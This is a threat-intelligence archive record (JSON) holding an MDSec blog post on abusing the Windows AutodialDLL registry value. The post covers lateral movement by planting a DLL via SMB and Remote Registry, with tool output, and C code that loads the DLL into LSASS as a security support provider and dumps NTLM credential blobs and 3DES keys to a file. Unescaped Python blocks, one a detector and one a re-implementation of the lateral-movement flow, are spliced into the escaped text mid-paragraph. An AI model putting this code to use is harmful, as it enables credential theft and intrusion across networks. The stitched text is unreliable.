{
	"id": "9fdb301f-7e00-47ad-b159-28d1aaec93a1",
	"created_at": "2026-04-06T00:12:56.797361Z",
	"updated_at": "2026-04-10T03:31:32.13105Z",
	"deleted_at": null,
	"sha1_hash": "812c69b805ac105421d4ddee2cfc54de64479205",
	"title": "Autodial(DLL)ing Your Way - MDSec",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 555866,
	"plain_text": "Autodial(DLL)ing Your Way - MDSec\r\nBy Admin\r\nPublished: 2022-10-26 · Archived: 2026-04-05 13:00:11 UTC\r\nhttps://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\r\n\r\nThe use of the AutodialDLL registry value (located under HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters) as a persistence method was previously documented by @Hexacorn in his series Beyond good ol’ Run key (Part 24). Use of this persistence method by threat actors has been identified in the wild in recent years; examples include:\r\nThe KOMPROGO backdoor, which incorporated this persistence method.\r\nOperation Dragon Castling.\r\nAlthough its observed use has been limited to persistence, this registry value can be used for other purposes. 
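Whatever the tactic, the footprint left on the host is the same: this one REG_SZ value stops pointing at rasadhlp.dll, so the defender's check is worth stating once before going further. The Python below is an added example, not code from the original post or from its author. It classifies the value as found in the output of reg query and in Sysmon registry value-set events (Event ID 13), and reads the live value when run on Windows. Its assumptions are marked in the code: the default data is the one this post quotes (c:\windows\system32\rasadhlp.dll), the %SystemRoot% spelling is treated as the same file, the reg query layout is name, type and data separated by runs of spaces, and the Sysmon fields are taken as already extracted from the event XML. The sample input is constructed, not captured from a real host.

```python
import re
import sys

AUTODIAL_KEY = 'SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters'
AUTODIAL_VALUE = 'AutodialDLL'
# Default data as quoted in the post. Treating the %SystemRoot% spelling as the
# same file is an assumption of this example.
DEFAULT_DLL = 'c:\\windows\\system32\\rasadhlp.dll'
SYSTEM32 = 'c:\\windows\\system32\\'


def normalize(data, system_root='c:\\windows'):
    '''Case-fold, trim and expand %SystemRoot% so equal files compare equal.'''
    return data.strip().lower().replace('%systemroot%', system_root)


def classify(data):
    '''Return (verdict, reason) for AutodialDLL data: ok, suspicious or review.'''
    if data is None:
        return 'review', 'AutodialDLL value absent; compare with a known-good build'
    norm = normalize(data)
    if norm == DEFAULT_DLL:
        return 'ok', 'default rasadhlp.dll'
    if not norm.startswith(SYSTEM32):
        return 'suspicious', 'AutodialDLL points outside System32: ' + data
    return 'suspicious', 'AutodialDLL is a non-default DLL inside System32: ' + data


def parse_reg_query(text):
    '''Parse the value lines of reg query output into {name: data}.

    Assumed layout: name, REG_* type and data separated by runs of spaces.
    '''
    values = {}
    for line in text.splitlines():
        parts = re.split(r'\s{2,}', line.strip())
        if len(parts) == 3 and parts[1].startswith('REG_'):
            values[parts[0]] = parts[2]
    return values


def triage_sysmon(events):
    '''Flag Sysmon Event ID 13 (value set) records that point AutodialDLL elsewhere.

    Events are dicts keyed by the Sysmon field names EventID, TargetObject,
    Details and Image (assumption: already extracted from the event XML).
    '''
    target = ('HKLM\\' + AUTODIAL_KEY + '\\' + AUTODIAL_VALUE).lower()
    alerts = []
    for ev in events:
        if ev.get('EventID') != 13 or (ev.get('TargetObject') or '').lower() != target:
            continue
        verdict, reason = classify(ev.get('Details'))
        if verdict != 'ok':
            alerts.append({'Image': ev.get('Image'), 'Details': ev.get('Details'), 'reason': reason})
    return alerts


def read_live_value():
    '''On Windows, read the live value with winreg; elsewhere return None.'''
    if sys.platform != 'win32':
        return None
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, AUTODIAL_KEY) as key:
        return winreg.QueryValueEx(key, AUTODIAL_VALUE)[0]


# Constructed sample input for this example, not captured from a real host.
SAMPLE_REG_QUERY = '''
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters
    AutodialDLL    REG_SZ    C:\\Windows\\System32\\rasadhlp.dll
    WinSock_Registry_Version    REG_SZ    2.0
'''
SAMPLE_EVENTS = [
    {'EventID': 13, 'Image': 'C:\\Windows\\system32\\svchost.exe',
     'TargetObject': 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters\\AutodialDLL',
     'Details': 'c:\\lolo.dll'},                          # the planted DLL path used in the post
    {'EventID': 13, 'Image': 'C:\\Windows\\system32\\svchost.exe',
     'TargetObject': 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters\\AutodialDLL',
     'Details': 'C:\\windows\\system32\\rasadhlp.dll'},   # the DLL putting the default back
    {'EventID': 13, 'Image': 'C:\\Windows\\regedit.exe',
     'TargetObject': 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater',
     'Details': 'C:\\Users\\Public\\u.exe'},              # unrelated key, ignored here
]

if __name__ == '__main__':
    print(classify(parse_reg_query(SAMPLE_REG_QUERY).get(AUTODIAL_VALUE)))
    for alert in triage_sysmon(SAMPLE_EVENTS):
        print(alert)
```

Note that the revert the post's DLL performs shows up as a second value-set event with the default data, so alerting on the first non-default write rather than on the current value is what catches a visit that cleaned up after itself.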
In this article we are going to discuss other creative tactics related to this registry value.\r\nLateral Movement\r\nWhen a process uses the WinSock2 library, it also loads additional DLLs that provide the functionality of the different WinSock2 service providers. The DLL named by the AutodialDLL value is one of these “extra” DLLs. By default it is set to C:\\windows\\system32\\rasadhlp.dll.\r\nIf we modify this registry value to point at a dummy DLL that traces attach/detach events, we can watch our DLL being loaded, one by one, by each new process that tries to make a network connection:\r\n[+] On Attach!C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\r\n[+] On Attach!C:\\Program Files\\Sublime Text 3\\sublime_text.exe\r\n[+] On Attach!C:\\Windows\\system32\\lsass.exe\r\n[+] On Attach!C:\\Windows\\System32\\dsregcmd.exe\r\n[+] On Dettach!C:\\Windows\\System32\\dsregcmd.exe\r\n[+] On Attach!C:\\Program Files\\Mozilla Firefox\\default-browser-agent.exe\r\n[+] On Attach!C:\\Windows\\system32\\svchost.exe\r\n[+] On Attach!C:\\Windows\\System32\\svchost.exe\r\n[+] On Dettach!C:\\Program Files\\Mozilla Firefox\\default-browser-agent.exe\r\n[+] On Attach!C:\\Windows\\System32\\dsregcmd.exe\r\n[+] On Dettach!C:\\Windows\\System32\\dsregcmd.exe\r\n[+] On Attach!C:\\Program Files\\Mozilla Firefox\\firefox.exe\r\n[+] On Dettach!C:\\Program Files\\Mozilla Firefox\\firefox.exe\r\n[+] On Dettach!C:\\Windows\\System32\\svchost.exe\r\n[+] On Attach!C:\\Windows\\system32\\msfeedssync.exe\r\n[+] On Attach!C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n[+] On Dettach!C:\\Windows\\system32\\msfeedssync.exe\r\n[+] On Dettach!C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n[+] On Attach!C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n[+] On Attach!C:\\Program Files 
(x86)\\Microsoft Visual Studio\\Installer\\resources\\app\\ServiceHub\\Services\\Microso\r\n[+] On Dettach!C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\resources\\app\\ServiceHub\\Services\\Micros\r\n[+] On Attach!C:\\Windows\\system32\\svchost.exe\r\n[+] On Dettach!C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\nThis behaviour can be exploited to perform lateral movement. Generally speaking, the idea is to upload a DLL to the target machine via SMB and then modify the registry via the Remote Registry service or WMI. The next time a process uses Winsock2 it loads our planted DLL and the execution of our payload is triggered.\r\nThis generic approach needs some polishing to solve a few inconveniences:\r\nThe DLL would be loaded by multiple processes until the registry value is restored.\r\nThe DLL would be loaded by non-privileged processes, meaning that we would spawn multiple restricted beacons.\r\nThe first issue is easily solved if our DLL restores the registry value as soon as it is loaded by a process with sufficient privileges. Writing to this HKLM key requires administrative rights, so the call simply fails in a low-privilege process and the value stays planted until a privileged one loads the DLL. To do this we can execute something as simple as the following on attach:\r\n LPCSTR orig = \"C:\\\\windows\\\\system32\\\\rasadhlp.dll\";\r\n HKEY hKey;\r\n if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters\", 0, KEY_AL\r\n RegSetValueExA(hKey, \"AutodialDLL\", 0, REG_SZ, (LPBYTE)orig, strlen(orig) + 1);\r\n RegCloseKey(hKey);\r\n }\r\nWith this trick we reduce the time frame in which the DLL could be loaded, but the problem of waiting for a highly privileged process to load it still remains. 
The best way to reduce the time window, and at the same time ensure that the DLL is loaded by a juicy process (one with sufficient privileges), is to start or restart a service immediately after modifying the registry value. After testing, potential candidates include the BITS and Windows Insider (wisvc) services. This brings our end-to-end methodology to:\r\n1. Upload the DLL to the target.\r\n2. Check whether Remote Registry is running; if not, start it.\r\n3. Modify HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters\\AutodialDLL to point to our DLL.\r\n4. If Remote Registry was not running, stop the service again to leave it in the same state.\r\n5. Check whether the Windows Insider Service (wisvc) or BITS is running and restart/start it.\r\n6. The DLL reverts the registry value to its original data (C:\\windows\\system32\\rasadhlp.dll).\r\n7. Profit!\r\nAll the necessary functionality is already implemented in Impacket, so the easiest way to implement this approach is to build a tool on that framework:\r\npsyconauta@insulanova:~/Research/autodialdll|⇒ python3 autodialmov.py -u eddard.stark -p 'FightP3aceAndHonor\r\n AUTODIALmov - @TheXC3LL\r\n[+] Connecting to 192.168.56.20\r\n[+] Uploading AutodialDLL-test.dll to c:\\lolo.dll\r\n[+] Checking Remote Registry service status...\r\n[+] Service is down!\r\n[+] Starting Remote Registry service...\r\n[+] Connecting to 192.168.56.20\r\n[+] Updating AutodialDLL value\r\n[+] Stopping Remote Registry Service\r\n[+] Checking BITS service status...\r\n[+] Service is down!\r\n[+] Starting BITS service\r\n[+] Sir, your beacon should be alive!\r\n[+] Finished!\r\n[^] Have a nice day!\r\nCredential harvesting\r\nThe article about Operation Dragon Castling documents how the threat actor registered a security support provider (SSP) for persistence. 
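Before combining the two techniques, the lateral movement sequence above is worth pinning down as code once, because the awkward parts are housekeeping rather than the registry write itself: Remote Registry must be left in the state it was found, the service that is kicked has to exist on the box and run with enough privilege, and the operator wants confirmation that the DLL really did put the old data back. The Python below is an added example, not the autodialmov.py tool from the post. It contains only the control flow; the FakeTarget class stands in for the remote host so the flow can run offline, and in a real tool its six methods would be Impacket calls (SMB file upload, Remote Registry reads and writes, Service Control Manager start/stop), which is an assumption of this example. Two departures from the post's step order are deliberate and labelled in the code: the current data is read before it is changed and the revert is verified while Remote Registry is still up, and a value the DLL failed to restore is restored by the operator.

```python
import time

WINSOCK_PARAMS = 'SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters'
AUTODIAL = 'AutodialDLL'
DEFAULT_DLL = 'C:\\windows\\system32\\rasadhlp.dll'  # the data the planted DLL puts back (from the post)


class FakeTarget:
    '''In-memory stand-in for the remote host, constructed for this example.

    The real tool does these operations over Impacket; here they mutate dicts.
    loads_on_start models the post's observation that starting wisvc or BITS makes
    that SYSTEM service load the planted DLL, which then restores the value itself.
    '''
    def __init__(self, services, loads_on_start=True):
        self.services = dict(services)  # name -> 'running' | 'stopped'
        self.registry = {(WINSOCK_PARAMS, AUTODIAL): DEFAULT_DLL}
        self.files = {}
        self.loads_on_start = loads_on_start
        self.loaded_by = []  # services whose start triggered the planted DLL

    def upload(self, data, remote_path):
        self.files[remote_path] = data

    def service_state(self, name):
        return self.services.get(name)  # None when the service does not exist

    def start_service(self, name):
        self.services[name] = 'running'
        planted = self.registry[(WINSOCK_PARAMS, AUTODIAL)]
        if self.loads_on_start and planted != DEFAULT_DLL and name != 'RemoteRegistry':
            self.loaded_by.append(name)
            self.registry[(WINSOCK_PARAMS, AUTODIAL)] = DEFAULT_DLL

    def stop_service(self, name):
        self.services[name] = 'stopped'

    def get_value(self, key, name):
        return self.registry.get((key, name))

    def set_value(self, key, name, data):
        self.registry[(key, name)] = data


def kick_service(target, candidates, log):
    '''Start (restart if already running) the first candidate service that exists.'''
    for name in candidates:
        state = target.service_state(name)
        if state is None:
            continue
        if state == 'running':
            target.stop_service(name)
            log.append('stop ' + name)
        target.start_service(name)
        log.append('start ' + name)
        return name
    raise RuntimeError('none of the candidate services exist: ' + ', '.join(candidates))


def autodial_move(target, dll_bytes, remote_dll, candidates=('wisvc', 'BITS'),
                  polls=5, sleep=time.sleep):
    '''Steps 1-7 from the post; returns the list of actions taken.

    Departures from the post, for operator safety: the current data is read before
    it is changed and the revert is checked while Remote Registry is still up; if
    the DLL has not restored it after `polls` checks the operator restores it.
    '''
    log = []
    target.upload(dll_bytes, remote_dll)
    log.append('upload ' + remote_dll)
    rr_was_running = target.service_state('RemoteRegistry') == 'running'
    if not rr_was_running:
        target.start_service('RemoteRegistry')
        log.append('start RemoteRegistry')
    try:
        original = target.get_value(WINSOCK_PARAMS, AUTODIAL)
        if original != DEFAULT_DLL:
            raise RuntimeError('AutodialDLL is already %r; refusing to stack on it' % (original,))
        target.set_value(WINSOCK_PARAMS, AUTODIAL, remote_dll)
        log.append('set AutodialDLL=' + remote_dll)
        try:
            kick_service(target, candidates, log)
        except Exception:
            target.set_value(WINSOCK_PARAMS, AUTODIAL, original)
            log.append('AutodialDLL restored manually')
            raise
        for _ in range(polls):
            if target.get_value(WINSOCK_PARAMS, AUTODIAL) == original:
                log.append('AutodialDLL reverted by the DLL')
                break
            sleep(1)
        else:
            target.set_value(WINSOCK_PARAMS, AUTODIAL, original)
            log.append('AutodialDLL restored manually')
    finally:
        if not rr_was_running:
            target.stop_service('RemoteRegistry')
            log.append('stop RemoteRegistry')
    return log
```

Refusing to run when AutodialDLL is already non-default is the check that stops two operators (or one retry) from stacking DLLs on the same host, since the planted DLL restores the hard-coded default and would wipe out whatever was there before.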
In our case, we can combine both TTPs (AutodialDLL and SSP) in the same DLL to collect credentials from remote machines.\r\nIt is possible to force the lsass process to load a new DLL, in the form of a Security Support Provider, without rebooting the computer by using the AddSecurityPackage API, which is an RPC call into LSASS. This was documented by @xpn in his article Exploring Mimikatz – Part 2 – SSP. We are going to reuse his code to perform the SSP load. But instead of patching LSASS to collect new credentials in plaintext, we are going to hunt for NTLM hashes in lsasrv.dll memory (similarly to sekurlsa::msv).\r\nFirst, our DLL must determine whether it has been loaded by lsass.exe or by a different process. In the latter case it issues the RPC call so that lsass.exe loads this same DLL (and reverts the AutodialDLL value to its original data to prevent additional lo
ads). If it has already been loaded by LSASS, it simply looks up the hashes in memory and saves them to a text file, for example:\r\nvoid onAttach(void) {\r\n LPSTR path = (LPSTR)malloc(MAX_PATH);\r\n GetModuleFileNameA(NULL, path, MAX_PATH);\r\n if (strncmp(path, \"C:\\\\Windows\\\\system32\\\\lsass.exe\", MAX_PATH) == 0) { getHashes(); }\r\n else {\r\n LPCSTR orig = \"C:\\\\windows\\\\system32\\\\rasadhlp.dll\";\r\n HKEY hKey;\r\n if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters\", 0, KE\r\n RegSetValueExA(hKey, \"AutodialDLL\", 0, REG_SZ, (LPBYTE)orig, strlen(orig) + 1);\r\n RegCloseKey(hKey);\r\n addSSP();\r\n }\r\n }\r\n free(path);\r\n}\r\nNote that the path comparison is case-sensitive, so it must match the casing GetModuleFileNameA returns (C:\\Windows\\system32\\lsass.exe in the trace above). In both cases the DLL returns FALSE from DllMain, so the loader unloads it and it does not remain resident in either process.\r\nBOOL WINAPI DllMain(\r\n HINSTANCE hinstDLL,\r\n DWORD fdwReason,\r\n LPVOID lpReserved)\r\n{\r\n switch (fdwReason)\r\n {\r\n case DLL_PROCESS_ATTACH:\r\n ourself = 
hinstDLL;\r\n onAttach();\r\n break;\r\n case DLL_THREAD_ATTACH:\r\n break;\r\n case DLL_THREAD_DETACH:\r\n break;\r\n case DLL_PROCESS_DETACH:\r\n break;\r\n }\r\n return FALSE;\r\n}\r\nThis time I am only interested in retrieving NTLM hashes, so I am going to implement something like sekurlsa::msv from Mimikatz as a proof of concept (as our DLL is loaded inside LSASS, it is trivial to imitate any Mimikatz functionality, so I picked the quickest one to implement as a PoC).\r\nThis is well explained in the article Uncovering Mimikatz ‘msv’ and collecting credentials through PyKD by Matteo Malvica, so it is redundant to explain it again here. In essence we search for signatures inside lsasrv.dll and then retrieve the information needed to locate the LogonSessionList structure and the crypto keys/IVs. As I am imitating Matteo Malvica's post for this PoC, I am going to retrieve only the cryptoblobs that are encrypted with Triple-DES (a blob length that is a multiple of 8 bytes, as the check in the loop below shows):\r\n//...\r\nHMODULE ourself = NULL;\r\n// In this PoC I am targeting Windows 10 1809. 
For a real usage it needs to check the Windows version and choose\r\n// https://github.com/gentilkiwi/mimikatz/blob/a2271237d168c6ca40d11ece565cf97a5e1d3fc1/mimikatz/modules/sekurls\r\nBYTE LsaInitialize_needle[] = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x44, 0x8b, 0x4d, 0xd8,\r\nBYTE LogonSessionList_needle[] = { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74 };\r\n//...\r\nvoid getHashes(void) {\r\n unsigned char* moduleBase;\r\n DWORD offset;\r\n DWORD offsetLogonSessionList_needle;\r\n unsigned char* iv_vector;\r\n unsigned char* DES_key = NULL;\r\n ULONGLONG iv_offset = 0;\r\n ULONGLONG hDes_offset = 0;\r\n ULONGLONG DES_pointer = 0;\r\n ULONGLONG LogonSessionList_offset = 0;\r\n unsigned char* currentElem = NULL;\r\n unsigned char* LogonSessionList;\r\n KIWI_BCRYPT_HANDLE_KEY h3DesKey;\r\n KIWI_BCRYPT_KEY81 extracted3DesKey;\r\n moduleBase = (unsigned char*)GetModuleHandleA(\"lsasrv.dll\");\r\n offset = SearchPattern(moduleBase, LsaInitialize_needle, sizeof(LsaInitialize_needle), 0x200000);\r\n \r\n FILE* file;\r\n if ((file = fopen(\"C:\\\\pwned.pwn\", \"ab\")) == NULL) {\r\n return;\r\n }\r\n char* loginfo;\r\n // 32-bit RIP-relative displacement after the needle -> address of the IV\r\n memcpy(\u0026iv_offset, offset + moduleBase + 0x43, 4);\r\n iv_vector = (unsigned char*)malloc(16);\r\n memcpy(iv_vector, offset + moduleBase + 0x43 + 4 + iv_offset, 16);\r\n fwrite(\"IV:\", strlen(\"IV:\"), 1, file);\r\n for (int i = 0; i \u003c 16; i++) {\r\n loginfo = (char*)malloc(4);\r\n snprintf(loginfo, 4, \"%02x\", iv_vector[i]);\r\n fwrite(loginfo, 2, 1, file);\r\n free(loginfo);\r\n }\r\n free(iv_vector);\r\n // displacement before the needle -> pointer to the 3DES BCrypt key handle\r\n memcpy(\u0026hDes_offset, moduleBase + offset - 0x59, 4);\r\n memcpy(\u0026DES_pointer, moduleBase + offset - 0x59 + 4 + hDes_offset, 8);\r\n memcpy(\u0026h3DesKey, (void *)DES_pointer, sizeof(KIWI_BCRYPT_HANDLE_KEY));\r\n memcpy(\u0026extracted3DesKey, h3DesKey.key, sizeof(KIWI_BCRYPT_KEY81));\r\n DES_key = (unsigned 
char*)malloc(extracted3DesKey.hardkey.cbSecret);\r\n memcpy(DES_key, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);\r\n fwrite(\"\\n3DES: \", strlen(\"\\n3DES: \"), 1, file);\r\n for (int i = 0; i \u003c extracted3DesKey.hardkey.cbSecret; i++) {\r\n loginfo = (char*)malloc(4);\r\n snprintf(loginfo, 4, \"%02x\", DES_key[i]);\r\n fwrite(loginfo, 2, 1, file);\r\n free(loginfo);\r\n }\r\n free(DES_key);\r\n offsetLogonSessionList_needle = SearchPattern(moduleBase, LogonSessionList_needle, sizeof(LogonSessionList_n\r\n memcpy(\u0026LogonSessionList_offset, moduleBase + offsetLogonSessionList_needle + 0x17, 4);\r\n LogonSessionList = moduleBase + offsetLogonSessionList_needle + 0x17 + 4 + LogonSessionList_offset;\r\n // Walk the doubly linked list starting at the list head; each entry is a logon session\r\n while (currentElem != LogonSessionList) {\r\n if (currentElem == NULL) {\r\n currentElem = LogonSessionList;\r\n }\r\n ULONGLONG tmp = 0;\r\n USHORT length = 0;\r\n LPWSTR username = NULL;\r\n ULONGLONG username_pointer = 0;\r\n memcpy(\u0026tmp, currentElem, 8);\r\n currentElem = (unsigned char*)tmp;\r\n if (currentElem == LogonSessionList) { break; } // Flink wrapped back to the head: it is not an entry\r\n memcpy(\u0026length, (void*)(tmp + 0x90), 2);\r\n username = (LPWSTR)malloc(length + 2);\r\n memset(username, 0, length + 2);\r\n memcpy(\u0026username_pointer, (void*)(tmp + 0x98), 8);\r\n memcpy(username, (void*)username_pointer, length);\r\n \r\n loginfo = (char*)malloc(1024);\r\n snprintf(loginfo, 1024, \"\\nUser: %S\\n\", username);\r\n fwrite(loginfo, strlen(loginfo), 1, file);\r\n free(loginfo);\r\n free(username);\r\n ULONGLONG credentials_pointer = 0;\r\n memcpy(\u0026credentials_pointer, (void*)(tmp + 0x108), 8);\r\n if (credentials_pointer == 0) {\r\n continue;\r\n }\r\n \r\n ULONGLONG primaryCredentials_pointer = 0;\r\n memcpy(\u0026primaryCredentials_pointer, (void*)(credentials_pointer + 0x10), 8);\r\n USHORT cryptoblob_size = 0;\r\n // Length field of the UNICODE_STRING is a USHORT: copy 2 bytes, not 4, or the next stack slot is overwritten\r\n memcpy(\u0026cryptoblob_size, (void*)(primaryCredentials_pointer + 0x18), sizeof(cryptoblob_size));\r\n if (cryptoblob_size % 8 != 0) {\r\n 
 loginfo = (char*)malloc(1024);\r\n snprintf(loginfo, 1024, \"\\nPasswordErr: NOT COMPATIBLE WITH 3DES, skipping\\n\");\r\n fwrite(loginfo, strlen(loginfo), 1, file);\r\n free(loginfo);\r\n continue;\r\n }\r\n ULONGLONG cryptoblob_pointer = 0;\r\n memcpy(\u0026cryptoblob_pointer, (void*)(primaryCredentials_pointer + 0x20), 8);\r\n unsigned char* cryptoblob = (unsigned char*)malloc(cryptoblob_size);\r\n memcpy(cryptoblob, (void*)cryptoblob_pointer, cryptoblob_size);\r\n loginfo = (char*)malloc(1024);\r\n snprintf(loginfo, 1024, \"\\nPassword:\");\r\n fwrite(loginfo, strlen(loginfo), 1, file);\r\n free(loginfo);\r\n for (int i = 0; i \u003c cryptoblob_size; i++) {\r\n loginfo = (char*)malloc(4);\r\n snprintf(loginfo, 4, \"%02x\", cryptoblob[i]);\r\n fwrite(loginfo, 2, 1, file);\r\n free(loginfo);\r\n }\r\n free(cryptoblob);\r\n \r\n }\r\n fclose(file);\r\n}\r\n//...\r\nFinally, we only need to adapt our previous Python script to read the text file containing the collected information and to decrypt the cryptoblobs (3DES in CBC mode with the dumped key, using the first 8 bytes of the 16-byte IV).\r\nThe code for this PoC can be found in this GitHub repo.\r\nThis blog post was written by Juan Manuel-Fernandez.",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/"
	],
	"report_names": [
		"autodialdlling-your-way"
	],
	"threat_actors": [
		{
			"id": "06260304-49f9-4d51-a22d-373c7fcb80ca",
			"created_at": "2022-10-25T16:07:23.944881Z",
			"updated_at": "2026-04-10T02:00:04.801806Z",
			"deleted_at": null,
			"main_name": "Operation Dragon Castling",
			"aliases": [],
			"source_name": "ETDA:Operation Dragon Castling",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434376,
	"ts_updated_at": 1775791892,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/812c69b805ac105421d4ddee2cfc54de64479205.pdf",
		"text": "https://archive.orkl.eu/812c69b805ac105421d4ddee2cfc54de64479205.txt",
		"img": "https://archive.orkl.eu/812c69b805ac105421d4ddee2cfc54de64479205.jpg"
	}
}